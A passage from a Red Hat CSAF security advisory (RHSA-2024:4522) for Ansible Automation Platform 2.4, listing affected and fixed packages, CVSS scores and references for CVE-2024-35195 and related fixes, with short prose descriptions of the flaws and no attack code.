"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2282114"
}
],
"notes": [
{
"category": "description",
"text": "An incorrect control flow implementation vulnerability was found in Requests. If the first request in a session is made with verify=False, all subsequent requests to the same host will continue to ignore cert verification.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "requests: subsequent requests to the same host ignore cert verification",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Within regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-670: Always-Incorrect Control Flow Implementation vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nThe platform\u0027s orchestration features, such as liveness and readiness probes, automated pod restarts, and health monitoring, help to quickly detect and recover from service-level failures resulting from incorrect control flows. Static code analysis and peer code review techniques are used to execute robust input validation and error-handling mechanisms to ensure all user inputs are thoroughly validated, preventing improperly validated inputs from causing system instability, exposing sensitive data, or escalating risks. Additionally, process isolation ensures that component issues are contained within the originating process, preventing them from affecting other processes or the system as a whole.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-35195"
},
{
"category": "external",
"summary": "RHBZ#2282114",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2282114"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-35195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35195"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-35195"
},
{
"category": "external",
"summary": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56",
"url": "https://github.com/psf/requests/security/advisories/GHSA-9wx4-h78v-vm56"
}
],
"release_date": "2024-05-20T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-07-12T01:43:40+00:00",
"details": "Red Hat Ansible Automation Platform",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "requests: subsequent requests to the same host ignore cert verification"
}
]
}
rhsa-2024:4522
Vulnerability from csaf_redhat
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Ansible Automation Platform 2.4\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.\n\nSecurity Fix(es):\n\n* automation-controller: jinja2: accepts keys containing non-attribute characters (CVE-2024-34064)\n* automation-controller: jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)\n* automation-controller: requests: subsequent requests to the same host ignore cert verification (CVE-2024-35195)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nUpdates and fixes for automation controller:\n* Fixed a bug where the controller does not respect \"DATABASES[\u2018OPTIONS\u2019]\" setting, if specified (AAP-26398)\n* Changed all uses of \"ImplicitRoleField\" to perform an \"on_delete=SET_NULL\" (AAP-25136)\n* Fixed the HostMetric automated counter to display the correct values (AAP-25115)\n* Added Django logout redirects (AAP-24543)\n* automation-controller has been updated to 4.5.8\n\nAdditional changes:\n* aap-metrics-utility has been updated to 0.3.0 (AAP-25875)\n* ansible-core has been updated to 2.15.12 (AAP-25536)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:4522",
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "2279476",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279476"
},
{
"category": "external",
"summary": "2282114",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2282114"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_4522.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix Update",
"tracking": {
"current_release_date": "2025-10-24T13:27:38+00:00",
"generator": {
"date": "2025-10-24T13:27:38+00:00",
"engine": {
